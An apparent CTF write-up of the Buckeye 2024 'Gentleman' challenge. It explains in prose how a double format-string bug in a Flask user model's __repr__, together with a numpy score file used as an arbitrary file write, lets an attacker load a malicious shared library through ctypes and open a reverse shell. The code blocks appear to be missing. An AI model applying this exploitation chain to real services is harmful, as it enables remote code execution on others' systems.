Buckeye 2024 was kinda fun CTF (except for web, I had struggled a little bit). But in the end .;,;. full cleared and secured first place! Gentleman was a interesting challenge, so here is the writeup.
TLDR: there is a format string vulnerability inside a class, and it has arbitrary file upload. Here is the payload to achieve RCE:
Open the website, it’s a normal TypeMonkey website with login and signup functionality:
Inside the source code, it provides a docker with python:3.12-slim-bookworm:
The email is interesting, but it’s super unclear what is the email referencing to. I have also tried to search this up, but everything on this email is not real. ¯\*(ツ)*/¯
There is a readflag, and the flag.txt is chown root:root /readflag && chmod 4755 /readflag, so clearly, there is something inside the challenge can lead to remote code execution in order to get the flag.
The TypeMonkey uses Flask as the main server and and SQLAlchemy as the user database. Flask session is encrypted using SECRET_KEY = token_urlsafe()[:32], so it’s pretty safe.
Reading through the source, the models.py looks little bit suspicious:
Format string
Inside the User Model, there is this extra __repr__ function. When we try to print out a Python object, it will try to call this object’s __repr__ function. Every object inherit this __repr__, but you can choose to overwrite it.
Overwriting a __repr__ function is not that harmful at all. But at this point, we have control of the username, and it uses format string twice. That creates a problem:
There are two format()s here, where the first format will find the {} and pass in the content. At here, the first format formats the username. We can craft a bad username that lead to access other objects:
However, Python format strings have a restriction in that it can’t call functions within the format string (more info here: HackTricks).
Moving on:
The __repr__ function is being called at here, str(user). I just added a print() statement inside the User class to find it’s being called here.
No function call? Access denied?
Now we know the goal is to get RCE, and the only vulnerability we have right now is this format string. The format string passes in a User object. What can we do with it? Usually, we can steal secrets with it! For example:
We can steal something from the main code, however, the issue is that the server wouldn’t return anything:
Due to this limitation, we need to find a way to achieve RCE. As demonstrated in the previous example, we might be able to invoke functions using []! By default, [] triggers the __getitem__ method within the Python object. Additionally, when accessing an object’s attribute, it calls a method like object.something, which invokes object.__getattr__(self, something). In fact, every Python operation is essentially a function call!
If there is something we can call, even if we can’t control the code or what we can call, we might still achieve RCE by finding a vulnerability deep within __getitem__ or __getattr__:
Although inside the format string we don’t have many built-ins and we only passed in a class, we can still access other objects inside Python. We will discuss later how we can get it, but assume we have all the objects accessible, what do we have right now?
Interesting packages are imported in here, such as numpy, json, werkzeug, jinja2, flask, sqlalchemy, etc.:
Even without considering the imported classes, within the Python standard library, there are more than two hundred specially defined __getitem__ methods. It’s overwhelming! How can we identify some dangerous __getitem__ or __getattr__ methods?
So we did a more systematic search to find all the functions that have __getitem__ and __getattr__ defined:
We examined each one individually, trying to find useful ones:
tempfile._TemporaryFileWrapper looks suspicious, but it’s not useful.
sqlalchemy.orm.util.AliasedClass is not useful either:
weakref.WeakValueDictionary is not useful either:
EntryPoints from importlib.metadata is not useful either:
All of them have potential, yet none of them are helpful.
Time to Do the Impossible!
My teammate Quasar knew this before we did all of this analysis:
But we all ignored this and was so hyperfocused on the author’s hint about the Python standard library:
After a while trying to find the needle, we turn back to the idea of ctypes:
ctype.cdll has a specialized __getitem__ function, which means every time when we do ctype.cdll['libc.so.6'] it will auto load the libc.so.6, which is amazing! However we were struggling, and didn’t know what to load. We tried to load /readflag, however, it’s compile limited it to being loaded:
We also tried to load the cpython module, but there was nothing really helpful in there, so we went through the source code again to find this:
It will save the score (no limit of how many score here), which is a numpy list, to a file! And according to the numpydocumentation, it doesn’t have a header!:
This means we have arbitrary file upload; we just never found it before and didn’t know it might have been helpful. But now everything has changed. We just need a library. Why don’t we just upload a library with bad code?
Payload time!
When we got to this point, there were only 50 minutes left in the CTF. It was super stressful and fun. We decided to just set up a reverse shell:
Compile this to libtest.so, and convert it to a Python float. However, the server will only save the score if it is bigger than the previous one, which means if the float has null, it won’t work.
Now we have a score that will result in the file that we want; we just need to figure out how to recover ctype:
Where the __init__ recovers a function, access __globals__ from the function, get the __builtins__, use __loader__ to load system, use ctypes inside the system module, and load cdll.